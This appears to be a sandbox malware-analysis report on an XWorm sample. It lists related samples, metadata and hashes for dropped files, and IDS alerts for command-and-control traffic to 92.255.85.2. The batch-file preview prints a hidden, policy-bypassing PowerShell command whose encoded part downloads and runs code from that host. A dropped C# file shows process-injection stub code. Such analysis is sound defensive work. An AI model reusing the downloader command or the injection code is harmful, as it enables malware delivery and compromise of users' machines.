ASN context (Match; Associated Sample Name / URL; Detection; Threat Name; Context):
SOVTEL-ASRU; 92.255.85_1.2.exe; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; 92.255.85.2.ps1; malicious; Unknown; context: 92.255.85.2
SOVTEL-ASRU; cmd.bat; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; 92.255.85.2.bat; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; 92.255.85_1.2.bat; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; 92.255.85.2.ps1; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; v4mNsTzbsL.exe; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; 92.255.85.2.ps1; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; 92.255.85_3.2.ps1; malicious; XWorm; context: 92.255.85.2
SOVTEL-ASRU; cmd.bat; malicious; XWorm; context: 92.255.85.2
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Mar 26 04:31:33 2025, 1st section name ".debug$S"
                                                Category:dropped
                                                Size (bytes):1332
                                                Entropy (8bit):3.992660468201351
                                                Encrypted:false
                                                SSDEEP:24:HAFzW9nZfYzgDfHfmwKEsmNwI+ycuZhNcakSYPNnqS2d:7BYu/FKhmm1ulca3gqSG
                                                MD5:107DA92193B5E6B6A294BDEB0674A7E7
                                                SHA1:1699520AEE301BD34551693C333EFBD7EBE5340A
                                                SHA-256:B46D9B814744D8ADED152A791CB3DDB92FB4F2441AAB78BD30FEC05069C5B54E
                                                SHA-512:DAEB2E4696C227E3FBDE35BBEA435E0BC3C68AC8F50866FE0DFAA51A7D7868108D1E84E76D5FA359594ABBF2A6ABDA957B1C7C69066B5E70AB2B0D6AB64A3033
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                File Type:MSVC .res
                                                Category:dropped
                                                Size (bytes):652
                                                Entropy (8bit):3.0940741100936107
                                                Encrypted:false
                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzGak7Ynqq+XPN5Dlq5J:+RI+ycuZhNcakSYPNnqX
                                                MD5:F5052759C99803CF8511CEEB21B86776
                                                SHA1:2B8233635F1EF468512A23E87E4BB4D25798A3DE
                                                SHA-256:33810EBC860779AC9B02021DD31317DE288516D8F72E13ABBA60D57D6CC35A3E
                                                SHA-512:105114BC7E9476DFE29814D72A59023421BA96B9ED98C920041CAD960292A0BE6FE152B07A3AC2A7A73FA2F293DDD74FA2FAD7A607382911B77E85D788123318
                                                Malicious:false
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):9122
                                                Entropy (8bit):4.613031027327575
                                                Encrypted:false
                                                SSDEEP:96:JO1vYGpHKU5fZBDeXWuaLN0lWeCAaEjcqQDJ7iiLYkhxdP7NFa/COAoTOyt13IPw:AaGu7vpcfDFfckhxdP7NA/CxoSytSPf4
                                                MD5:58B10EF6BA0DA88788F1AAC56CE7E2DB
                                                SHA1:48221936B98AAC14EAD7C4589513D074365414EC
                                                SHA-256:AE11144F426028E50E77D64A66AEB954E169F627F8ABFE403791032594834520
                                                SHA-512:19C28B5AF8E4243350EE13C423FD066CEF969A5C86DE5F7B2AC4E4FBF75FDA17E82A6A91FBD6034786B9BEEE77E2EB4B1CECD1CF0B901E2874B88DA3E338845E
                                                Malicious:true
                                                Preview:.using System.Diagnostics;..using System.Runtime.InteropServices;..using System;....namespace Stub..{.. public static class Look.. {.. #region API delegate.. private delegate int ResumeThreadHandler(IntPtr handle);.. private delegate bool SetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool SetThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetThreadContextHandler(IntPtr thread, int[] context);.. private delegate int VirtualAllocExHandler(IntPtr handle, int address, int length, int type, int protect);.. private delegate bool WriteMemoryHandler(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);.. private delegate bool ReadMemoryHandler(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);.. private delegate
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                Category:dropped
                                                Size (bytes):204
                                                Entropy (8bit):4.945462917559162
                                                Encrypted:false
                                                SSDEEP:6:pAu+H2L/6K2wkn23fuzsH0zxszIwkn23fuzIHn:p37L/6KRfUsUQfUIHn
                                                MD5:A45E41173D0E386E4AF0358B9F2CD3C8
                                                SHA1:285EFD4CE3BF119B2B14A058285E7A3E3FA78E17
                                                SHA-256:16B94A56556D68B434C6F0A8831DBDC3A7FFAE965F0313E63A90EAB1D5564F4D
                                                SHA-512:5A249A8D04AFBB728E629A4FA96D8BB5006D9E4571C16BF0C9844FD3F2745D3296F1671942E79EA0AE0655A2F1C314E9174146915A1B86EF032F0A6890FB2242
                                                Malicious:true
                                                Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\strztqek\strztqek.0.cs"
                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):8704
                                                Entropy (8bit):4.520686486467739
                                                Encrypted:false
                                                SSDEEP:192:HxhVsIlJlHlHlHlHldlglfbflnldIGNuBalMg5MqoexD:R1lJlHlHlHlHldlglfbflnlfABO5MqDB
                                                MD5:8535CBD3C939BA2379B8D1B2F1D1C49B
                                                SHA1:175B7C96E6951143B05C2074E11B18B60197934C
                                                SHA-256:38A878FEE21505F54EF4524AE4350E9267760855F873ED751163F8F3C73B2C1B
                                                SHA-512:032FB72C443711022FA77B1AE179B918A958D60E7BC5BE988EF471D5DF7D8D92FA3614DB4F6A5074DE9C78F1D1E2FFF54D7B09EB1A3C52D7EAAA5F8E53992035
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                Category:modified
                                                Size (bytes):704
                                                Entropy (8bit):5.23162059632457
                                                Encrypted:false
                                                SSDEEP:12:KJN/IR37L/6KRfUsUQfUIHuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBIdn6KRfUYfUIHuKax5DqBVKVrdFAw
                                                MD5:6FFBB40997F300798F7E3C1A13F623AE
                                                SHA1:99DD95F11717817480328E8C3D5AA3C51D358F42
                                                SHA-256:F5A65A8D4B5DF06721D4F1C21C5140B3D14DC3B01CDC21D34CD10B3E913B9FC2
                                                SHA-512:CA5521955111863DDD900582C06A5DBE0A82F01B20DB79EA84DE3E1AA229237FEFBB283FF67156CA10B60EFF046EE27B5FD59D7879076EB1847F594A9011C8C6
                                                Malicious:false
                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\strztqek\strztqek.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                File type:DOS batch file, ASCII text, with CRLF line terminators
                                                Entropy (8bit):4.905613552394083
                                                TrID:
                                                  File name:92.255.85.2.bat
                                                  File size:290 bytes
                                                  MD5:dba98e15d9d6d186ec7b4029f49691a9
                                                  SHA1:c21a4ab95820f33bff18b333ff33a880f0a7e5dd
                                                  SHA256:3f7b520f93027782e5db0e094dd1924c78e6562eb6156dd5d001ec4076413be4
                                                  SHA512:aeaf2c69841f6e3074377d4aad556915ed37a9af6042350fd868269c4254c9e8d4bbd51e8747fa7a1db88a072f987b25fd333a14ca81a21872dd2c9da67684d0
                                                  SSDEEP:6:hSG80QO0c5I1R3K/odqS/S51LFjh7RzZxktdEOlaAXkQxGRrVRV:0G80Qpc5I1k/odqkg1LFjh7hkBisehRV
                                                  TLSH:13D0E71715D4FC4C87E7340048D7708510CD3507EA31CC545A2214F97CC4384D32B5C8
                                                  File Content Preview:@echo off..powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADg
                                                  Icon Hash:9686878b929a9886


                                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                  2025-03-26T04:16:31.433972+0100 | 2860704 | ETPRO MALWARE Single Character .mp4 Download With Minimal Headers - Likely Hostile | 1 | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
                                                  2025-03-26T04:16:31.629098+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
                                                  2025-03-26T04:16:31.629098+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
                                                  2025-03-26T04:16:32.921009+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
                                                  2025-03-26T04:16:32.921009+0100 | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | 1 | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
                                                  2025-03-26T04:16:32.921009+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP
                                                  2025-03-26T04:16:43.466077+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:16:43.466077+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:16:49.319060+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:16:49.514320+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:16:49.517689+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:01.479932+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:01.482824+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:13.451658+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:13.453838+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:13.650572+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:25.425533+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:25.428914+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:37.392026+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:37.393662+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:43.466619+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:44.856662+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:44.861673+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:50.030635+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:50.227154+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:50.227234+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:50.421592+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:50.421926+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:50.666373+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:54.840066+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:54.844212+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:17:55.283537+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:17:55.285057+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:07.090159+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:07.092219+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:10.733214+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:10.936247+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:10.937363+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:11.179489+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:13.464004+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:16.467874+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:16.469414+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:26.591249+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:26.594039+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:35.395014+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:35.591181+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:35.596080+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:36.715860+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:36.913478+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:36.913554+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:37.164279+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:42.968290+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:42.969926+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:43.465214+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:54.953471+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:54.956480+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:18:57.312199+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:18:57.317866+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:02.653237+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:02.678853+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:07.043940+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:07.045934+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:13.467848+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:16.762696+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:16.764512+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:18.887479+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:19.083128+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:19.083288+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:19.318764+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:24.279149+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:24.281096+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:26.247568+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:26.249496+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:34.544073+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:34.743055+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:34.743146+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:34.937960+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:37.888014+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:37.889843+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:39.795628+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:39.800308+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:40.235872+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
                                                  2025-03-26T04:19:40.237882+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP
                                                  2025-03-26T04:19:43.464364+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP
